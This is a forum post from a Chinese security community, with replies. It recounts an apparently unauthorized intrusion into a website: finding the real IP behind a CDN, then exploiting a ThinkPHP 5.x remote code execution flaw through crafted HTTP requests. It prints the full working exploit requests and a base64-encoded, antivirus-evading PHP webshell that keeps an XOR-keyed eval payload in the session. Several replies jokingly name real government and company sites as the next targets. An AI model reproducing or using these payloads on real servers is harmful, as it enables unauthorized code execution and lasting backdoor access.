首页
社区
课程
招聘
问答 CTF 排行榜 知识库 工具下载 看雪峰会 看雪商城 证书查询
  1. 社区
  2. WEB安全
    3. 发新帖
[原创]在吗?网站发来 打你一下
发表于: 2023-4-7 04:33 1115

[原创]在吗?网站发来 打你一下

Yaoヽ药药 活跃值
2023-4-7 04:33
1115

开局一张图,内容全靠吹
图片描述

 

目标站没有东西,尝试了找旁站

 

有cdn,通过fofa搜索特征找到真实IP

 

发现一个旁站,内容都空的
图片描述

 

指纹识别发现thinkphp5.x

 

尝试一键化工具:
图片描述

 

发现一个能检测:
图片描述

1
2
3
4
GET /?s=index/\think\Request/input&filter=md5&data=0 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows; U; Win 9x 4.90; en-US; rv:1.7.1) Gecko/20040707
Host: <ip>
Connection: close

状态码911,但感觉不太像误报,尝试大量payload,发现一个有问题

1
2
3
4
5
6
POST /?s=captcha&test=-a HTTP/1.1
Host:<ip>
User-Agent:Mozilla/5.0
Content-Length:70
Accept: text/html, image/gif, image/jpeg, *; q=2, */*; q=2
Connection: close

UA头枚举

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
POST /?s=captcha&test=-1 HTTP/2
Host: <ip>
Cookie: PHPSESSID=11111
Content-Length: 1150
Cache-Control: max-age=0
Sec-Ch-Ua: "Not_A Brand";v="99", "Google Chrome";v="109", "Chromium";v="109"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "macOS"
Upgrade-Insecure-Requests: 1
Origin: <ip>
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://<ip>/?s=captcha&test=-1
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9

通过UA枚举payload成功拿到执行phpinfo
图片描述

 

通过phpinfo找到路径后,disable function函数禁掉部分命令执行函数,但是没禁掉assert,简单上个一句话

1
_method=__construct&method=get&filter[]=assert&get[1][0]=file_put_contents('/data/wwwroot/<路径>/public/<文件名>.php','<webshell>')&get[1][1]=phpinfo

好家伙,马子直接被杀,转换一下,采用冰蝎或者免杀马,用Base64方法写入根目录文件

 

奥力给!!!!

1
_method=__construct&method=get&filter[]=assert&get[1][0]=file_put_contents('/data/wwwroot/<>/public/<name>',base64_decode("PD9waHAKQHNlc3Npb25fc3RhcnQoKTsKQHNldF90aW1lX2xpbWl0KDApOwpAZXJyb3JfcmVwb3J0aW5nKDApOwpmdW5jdGlvbiBlbmNvZGUoJEQsJEspewogICAgZm9yKCRpPTA7JGk8c3RybGVuKCREKTskaSsrKSB7CiAgICAgICAgJGMgPSAkS1skaSsxJjE1XTsKICAgICAgICAkRFskaV0gPSAkRFskaV1eJGM7CiAgICB9CiAgICByZXR1cm4gJEQ7Cn0KJHBheWxvYWROYW1lPSdwYXlsb2FkJzsKJGtleT0nM2M2ZTBiOGE5YzE1MjI0YSc7CiRkYXRhPWZpbGVfZ2V0X2NvbnRlbnRzKCJwaHA6Ly9pbnB1dCIpOwppZiAoJGRhdGEhPT1mYWxzZSl7CiAgICAkZGF0YT1lbmNvZGUoJGRhdGEsJGtleSk7CiAgICBpZiAoaXNzZXQoJF9TRVNTSU9OWyRwYXlsb2FkTmFtZV0pKXsKICAgICAgICAkcGF5bG9hZD1lbmNvZGUoJF9TRVNTSU9OWyRwYXlsb2FkTmFtZV0sJGtleSk7CiAgICAgICAgaWYgKHN0cnBvcygkcGF5bG9hZCwiZ2V0QmFzaWNzSW5mbyIpPT09ZmFsc2UpewogICAgICAgICAgICAkcGF5bG9hZD1lbmNvZGUoJHBheWxvYWQsJGtleSk7CiAgICAgICAgfQoJCWV2YWwoJHBheWxvYWQpOwogICAgICAgIGVjaG8gZW5jb2RlKEBydW4oJGRhdGEpLCRrZXkpOwogICAgfWVsc2V7CiAgICAgICAgaWYgKHN0cnBvcygkZGF0YSwiZ2V0QmFzaWNzSW5mbyIpIT09ZmFsc2UpewogICAgICAgICAgICAkX1NFU1NJT05bJHBheWxvYWROYW1lXT1lbmNvZGUoJGRhdGEsJGtleSk7CiAgICAgICAgfQogICAgfQp9Cg=="))&get[1][1]=phpinfo

[培训]《安卓高级研修班(网课)》月薪三万计划,掌握调试、分析还原ollvm、vmp的方法,定制art虚拟机自动化脱壳的方法

收藏
免费 2
支持
分享
最新回复 (8)
TrumpWY
雪    币: 859
活跃值: (865)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
私信
2
www.baidu.com
2023-4-10 09:15
0
goldening
雪    币: 78
活跃值: (442)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
私信
3
https://www.cia.gov/
http://usa.gov/
2023-4-10 10:39
0
scabrpid
雪    币: 289
能力值: ( LV1,RANK:0 )
在线值:
发帖
回帖
粉丝
私信
4
http://www.gov.com
2023-4-11 10:20
0
private1215
雪    币: 944
活跃值: (401)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
私信
5

https://www.nasa.gov/
2023-4-23 17:47
0
hkfans
雪    币: 576
活跃值: (1163)
能力值: ( LV8,RANK:130 )
在线值:
发帖
回帖
粉丝
私信
6
www.kanxue.com
2023-4-23 17:54
0
Ag188
雪    币:
能力值: ( LV1,RANK:0 )
在线值:
发帖
回帖
粉丝
私信
7
求大佬v
2023-5-2 19:38
0
洪七公.
雪    币: 2119
活跃值: (1865)
能力值: ( LV5,RANK:70 )
在线值:
发帖
回帖
粉丝
私信
8
www.baidu.com
2023-5-2 20:19
3
Moril
雪    币: 130
活跃值: (405)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
私信
9
www.baidu.com
2023-5-5 10:19
0
游客
登录 | 注册 方可回帖
回帖 表情 雪币赚取及消费
高级回复
返回
//